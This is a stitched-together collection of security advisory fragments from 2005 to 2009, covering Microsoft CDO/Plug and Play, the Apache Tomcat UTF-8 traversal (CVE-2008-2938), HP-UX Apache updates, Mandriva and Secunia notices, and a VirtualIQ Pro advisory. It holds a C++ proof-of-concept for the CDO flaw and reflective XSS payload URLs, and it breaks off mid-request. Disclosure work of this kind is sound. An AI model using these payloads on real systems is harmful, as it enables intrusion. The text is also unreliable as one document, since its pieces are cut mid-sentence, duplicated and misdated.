Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
CAN-2005-1987
Demonstration:
The following CDO code demonstrates the problem.
Step 1.
Create an E-mail named vuln.eml including a large "Content-Type:"
header.
Step 2.
// Compile with -GX option
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")
#include <stdio.h>
int main()
{
CoInitialize(0);
try
{
CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
_StreamPtr spStream(spMsg->GetStream());
spStream->Position = 0;
spStream->Type = adTypeBinary;
spStream->LoadFromFile("vuln.eml");
spStream->Flush();
for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
{
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
}
}
catch(_com_error &e)
{
printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
}
catch(...)
{
printf("General exception\n");
}
CoUninitialize();
return 0;
}
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security
to further your knowledge and protect your network
http://www.sec-1.com/applied_hacking_course.html
**************************************************************
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Technical Cyber Security Alert TA05-284A
Microsoft Windows, Internet Explorer, and Exchange Server
Vulnerabilities
Original release date: October 11, 2005
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
* Microsoft Exchange Server
For more complete information, refer to the Microsoft Security
Bulletin Summary for October 2005.
Overview
Microsoft has released updates that address critical vulnerabilities
in Windows, Internet Explorer, and Exchange Server.
I. Description
Microsoft Security Bulletins for October 2005 address vulnerabilities
in Windows and Internet Explorer. Further information is available in
the following US-CERT Vulnerability Notes:
VU#214572 - Microsoft Plug and Play fails to properly validate user
supplied data
Microsoft Plug and Play contains a flaw in the handling of message
buffers that may result in local or remote arbitrary code execution or
denial-of-service conditions.
(CAN-2005-1987)
VU#922708 - Microsoft Windows Shell fails to handle shortcut files
properly
Microsoft Windows Shell does not properly handle some shortcut files
and may permit arbitrary code execution when a specially-crafted file
is opened.
(CAN-2005-0163)
II. An attacker may also be able to cause a
denial of service.
III. Solution
Apply Updates
Microsoft has provided the updates for these vulnerabilities in the
Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the following US-CERT Vulnerability Notes for workarounds.
Appendix A. References
* Microsoft Security Bulletin Summary for October 2005 -
<http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>
* US-CERT Vulnerability Note VU#214572 -
<http://www.kb.cert.org/vuls/id/214572>
* US-CERT Vulnerability Note VU#883460 -
<http://www.kb.cert.org/vuls/id/883460>
* US-CERT Vulnerability Note VU#922708 -
<http://www.kb.cert.org/vuls/id/922708>
* US-CERT Vulnerability Note VU#995220 -
<http://www.kb.cert.org/vuls/id/995220>
* US-CERT Vulnerability Note VU#180868 -
<http://www.kb.cert.org/vuls/id/180868>
* US-CERT Vulnerability Note VU#950516 -
<http://www.kb.cert.org/vuls/id/950516>
* US-CERT Vulnerability Note VU#959049 -
<http://www.kb.cert.org/vuls/id/959049>
* US-CERT Vulnerability Note VU#680526 -
<http://www.kb.cert.org/vuls/id/680526>
* CAN-2005-2120 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>
* CAN-2005-1987 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>
* CAN-2005-2122 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>
* CAN-2005-2128 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>
* CAN-2005-2119 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>
* CAN-2005-1978 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>
* CAN-2005-2127 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>
* CAN-2005-0163 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate>
_________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA05-284A.html>
_________________________________________________________________
Feedback can be directed to US-CERT. Please send email to:
<cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject.
_________________________________________________________________
Revision History
Oct 11, 2004: Initial release
_________________________________________________________________
Produced 2005 by US-CERT, a government organization.
Terms of use
<http://www.us-cert.gov/legal.html>
_________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/>.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBQ0xBVn0pj593lg50AQJvOQf/QqIy3putm/wkUAUguQaylsCfC38Lysdc
bqbtj7oF6HEoCzhQguaqQdMGOqa4QJnrObnkHN29xFhYovKWOIYkYsh6c3IXaNLK
PdImVbcMFNn9VsBNNRVr2dqPXJPvgFFzQKsDcKkknnZyxLf5mshwDJoKFsKDGr9c
1P9yxwyagQ8G73gTq6hPV/Wl/6zElXH/chlh6haXe6XN9ArTmz8A3OCAN+BZQUqe
/9T4US8oxLeLlNDcQc/PV5v3VuXXW0v9kjEjqAVEH5tRKH/oIkVdgpj7gdrAzDjM
MUojHfl1v2/JwWubQ9DFQsBx4Jxv5YvJEREsU7RbVJotn02+Yaaeog==
=5hXu
-----END PGP SIGNATURE-----
VAR-200808-0154 | CVE-2008-2938 |
Apache Tomcat UTF8 Directory Traversal Vulnerability
Related entries in the VARIoT exploits database: VAR-E-200703-0008, VAR-E-200703-0006, VAR-E-200703-0005, VAR-E-200703-0007, VAR-E-200703-0002, VAR-E-200703-0001, VAR-E-200703-0003, VAR-E-200703-0004, VAR-E-200607-0003 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system. Multiple Java runtime implementations are prone to a vulnerability because the applications fail to sufficiently sanitize user-supplied input.
Exploiting this issue in Apache Tomcat will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks. Other attacks may also be possible.
Exploiting this issue in other applications will depend on the individual application. Successful exploits may result in a bypass of intended security filters. This may have various security impacts. We will update this BID pending further investigation.
UPDATE (December, 18, 2008): Reports indicate that this issue may affect additional, unspecified Java Virtual Machine (JVM) implementations distributed by Sun, HP, IBM, Apple, and Apache. We will update this BID as more information becomes available.
UPDATE (January 9, 2009): This BID previously documented an issue in Apache Tomcat. Further reports indicate that the underlying issue is in various Java runtime implementations. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01650939
Version: 1
HPSBUX02401 SSRT090005 rev.1 - HP-UX Running Apache Web Server Suite, Remote Denial of Service (DoS), Cross-site Scripting (XSS), Execution of Arbitrary Code, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-02-02
Last Updated: 2009-02-02
Potential Security Impact: Remote Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, cross-site request forgery (CSRF)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server or Tomcat-based Servelet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, or cross-site request forgery (CSRF). Apache-based Web Server and Tomcat-based Servelet Engine are contained in the Apache Web Server Suite.
HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or earlier or Tomcat-based Servelet Engine v5.5.27.01.01 or earlier
HP-UX B.11.11 running Apache-based Web Server v2.2.8.01.01 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===============================================
Reference Base Vector Base Score
CVE-2007-6420 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1232 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1947 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2364 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2370 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2938 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2939 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-3658 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 7.5
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:
URL: http://software.hp.com
Note: HP-UX Web Server Suite v.3.02 contains HP-UX Apache-based Web Server v.2.2.8.01.02
and HP-UX Tomcat-based Servlet Engine 5.5.27.01.01
HP-UX Release - B.11.23 and B.11.31 PA-32
Apache Depot name - HPUXWSATW-B302-32.depot
HP-UX Release - B.11.23 and B.11.31 IA-64
Apache Depot name - HPUXWSATW-B302-64.depot
HP-UX Release - B.11.11 PA-32
Apache Depot name - HPUXWSATW-B222-1111.depot
MANUAL ACTIONS: Yes - Update
Install Apache-based Web Server or Tomcat-based Servelet Engine from the Apache Web Server Suite v3.02 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
hpuxwsTOMCAT.TOMCAT
hpuxwsWEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.23
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.31
==================
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 2 February 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSYhX8+AfOvwtKn1ZEQJxcACeJa8lt5TkhV5qnaGRTaBh4kqHutgAoJbH
XCe08aGCzEZj/q4n91JQnhq6
=XImF
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Update 2
Severity: Important
Vendor:
Multiple (was The Apache Software Foundation)
Versions Affected:
Various
Description (new information):
This vulnerability was originally reported to the Apache Software Foundation as
a Tomcat vulnerability. Investigations quickly identified that the root cause
was an issue with the UTF-8 charset implementation within the JVM.
It was decided to continue to report this as a Tomcat vulnerability until such
time as the JVM vendors had released fixed versions.
Unfortunately, the release of fixed JVMs and associated vulnerability disclosure
has not been co-ordinated. There has been some confusion within the user
community as to the nature and root cause of CVE-2008-2938.
Mitigation:
Contact your JVM vendor for further information.
Tomcat users may upgrade as follows to a Tomcat version that contains a workaround:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should upgrade to 4.1.39
Credit:
This additional information was discovered by the Apache security
team. This release updates Tomcat to 5.5.27
which patches several security vulnerabilities.
Affected Products
=================
The WiKID Strong Authentication Server - Enterprise Edition
The WiKID Strong Authentication Server - Community Edition
References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286
Mitigation
==========
Commercial users may download the most recent RPMs from the website:
http://www.wikidsystems.com/downloads/
Users of the open source community version may download packages from
Sourceforge:
https://sourceforge.net/project/showfiles.php?group_id=144774
- --
Nick Owen
WiKID Systems, Inc.
404-962-8983 (desk)
http://www.wikidsystems.com
Two-factor authentication, without the hassle factor.
A cross-site scripting vulnerability was found in the
HttpServletResponse.sendError() method which could allow a remote
attacker to inject arbitrary web script or HTML via forged HTTP headers
(CVE-2008-1232).
A cross-site scripting vulnerability was found in the host manager
application that could allow a remote attacker to inject arbitrary
web script or HTML via the hostname parameter (CVE-2008-1947).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
56ca5eb3e331c6675634a5e3f3c5afd7 2008.0/i586/tomcat5-5.5.23-9.2.10.2mdv2008.0.i586.rpm
a1c688654decf045f80fb6d8978c73fa 2008.0/i586/tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
2b7a97313ece05bbd5596045853cfca0 2008.0/i586/tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
e8384332efad0e2317a646241bece6ee 2008.0/i586/tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.i586.rpm
a30cc8061f55f2613c517574263cdd21 2008.0/i586/tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
4f4a12c8479f27c7f9ed877f5821afa3 2008.0/i586/tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
ced904c459478c1123ed5da41dddbd7f 2008.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
183e045a9b44747c7a4adaec5c860441 2008.0/i586/tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
78af5a5788ac359a99a24f03a39c7b94 2008.0/i586/tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
8e8569bfab5abef912299b9b751e49e9 2008.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
6899c327906423cdd02b930221c2496e 2008.0/i586/tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
39fd3985d73f2f20efe4ed97c2a5e7c7 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.2mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
c4d1c4471c29d8cd34adb9f2002ef294 2008.0/x86_64/tomcat5-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
2caf09173a64a378636496196d99756f 2008.0/x86_64/tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
d6a9a290638267a1117a55041986d31a 2008.0/x86_64/tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
2eead87d72af58ddc9e934b55e49a1aa 2008.0/x86_64/tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
0fab26f89e83c882c5948a430bf82c8b 2008.0/x86_64/tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
833334424b555a77e2a9951b71ed8fa3 2008.0/x86_64/tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
115561d6233c3890cf3b85a7599ed03b 2008.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
eccf76ede6fb9256a2b52c861a9b0bb3 2008.0/x86_64/tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
cd9df1a8a1a5cb3216221bdefdfe8476 2008.0/x86_64/tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
f7440a4111ec2fd30fa32e4bd74a0a20 2008.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
1464eb297888c4df98d8b7eabe7f0197 2008.0/x86_64/tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm
39fd3985d73f2f20efe4ed97c2a5e7c7 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.2mdv2008.0.src.rpm
Mandriva Linux 2008.1:
594abdc70bc430657eb831520926c73f 2008.1/i586/tomcat5-5.5.25-1.2.1.1mdv2008.1.i586.rpm
bdec2b83b4fdb4d10a01a65fbdac512d 2008.1/i586/tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1.i586.rpm
3dbc007722996d1c36f31642f80b5c2a 2008.1/i586/tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1.i586.rpm
04b23d162d13f84d1d8707646ea9148c 2008.1/i586/tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1.i586.rpm
602bf7d4ff261e8af20d50b9e76634bb 2008.1/i586/tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1.i586.rpm
0066e7519a2d3478f0a3e70bd95a7e5b 2008.1/i586/tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm
1ba4743762cfa4594a27f0393de47823 2008.1/i586/tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1.i586.rpm
262f2a39b800562cef36d724ce3efa35 2008.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm
b9f2af35a734d0e3a2d9bfe292aaced1 2008.1/i586/tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1.i586.rpm
8307ef374c5b995feac394b6f27474d5 2008.1/i586/tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1.i586.rpm
3f4692170c35f992defcb4111a8133cd 2008.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm
02b9d28af879b825754eff6199bf1788 2008.1/i586/tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1.i586.rpm
2621d41df35e895a1ed0ed471f93f211 2008.1/SRPMS/tomcat5-5.5.25-1.2.1.1mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
6b1e03e5206eb262970198dccba7d0a3 2008.1/x86_64/tomcat5-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
930cf38058a0f8902e2741c6512e0aa0 2008.1/x86_64/tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
c527521cb93bab31df3f91422faf02a6 2008.1/x86_64/tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
f8bef98047ef956c8e4c0f877155e1f1 2008.1/x86_64/tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
97a8a59178259d26838ce20c176c459a 2008.1/x86_64/tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
3bb885debc8576bd305c9fa4c9d25bfb 2008.1/x86_64/tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
66dcf08e163fdaaf81992a7d25d84a20 2008.1/x86_64/tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
dd92aab81bf4c75ab30b9b82153b24c0 2008.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
517ed776282d089dd84f81d47104f660 2008.1/x86_64/tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
83d4bb973b7fec461e812d74541a5949 2008.1/x86_64/tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
cbdd58e1c9e1e8f0089af055abbd85e0 2008.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
cbee0f1f720269f77a66e30709ecd7ae 2008.1/x86_64/tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm
2621d41df35e895a1ed0ed471f93f211 2008.1/SRPMS/tomcat5-5.5.25-1.2.1.1mdv2008.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIwYsKmqjQ0CJFipgRApJjAKCVZ1XtEGoADQcp8l/m1ECSRstnjACg4qE8
j+sCdAEJN0CXvurmFcjUvNU=
=+kFf
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. In these
configurations arbitrary files in the docBase for an application,
including files such as web.xml, may be disclosed.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Secure Network - Security Research Advisory
Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.toutvirtual.com
Author(s): Alberto Trivero (a.trivero@securenetwork.it)
Claudio Criscione (c.criscione@securenetwork.it)
Vendor disclosure: 02/07/2009
Vendor acknowledged: 16/07/2009
Vendor patch release: notified us on 06/11/2009
Public disclosure: 07/11/2009
Advisory number: SN-2009-02
Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt
*** SUMMARY ***
ToutVirtual's VirtualIQ Pro is specifically designed for IT administrators
responsible for managing virtual platforms. VirtualIQ Pro provides
Visibility, Analytics and policy-based Optimization - all from one single
console. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type
II hypervisors. VirtualIQ Pro can be used to visualize, analyze and
optimize your choice of virtualization platform - Citrix, Microsoft,
Novell, Oracle and/or VMware.
Multiple vulnerabilities has been found which a allow an attacker to conduct
various XSS and CSRF attack, and other attacks due to the use
of an old an not hardened version of the web server.
*** VULNERABILITY DETAILS ***
(a) Cross-site scripting (XSS)
Due to an improper sanitization of user's input, multiple XSS attacks
(reflective and stored) are possible.
Reflective PoCs:
http://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><script>alert(1)</script>&resultResourceIds=111-222-1933email@address.tst
http://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&deptName=%22;alert(1);//&deptId=1&deptDesc=asd
http://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);//
http://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Stored XSS attacks can be triggered in the "Middle Name" parameter in the
"Edit Profile" page with an HTTP request like the following:
POST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1
Host: server:9080
Cookies: JSESSIONID=[...]
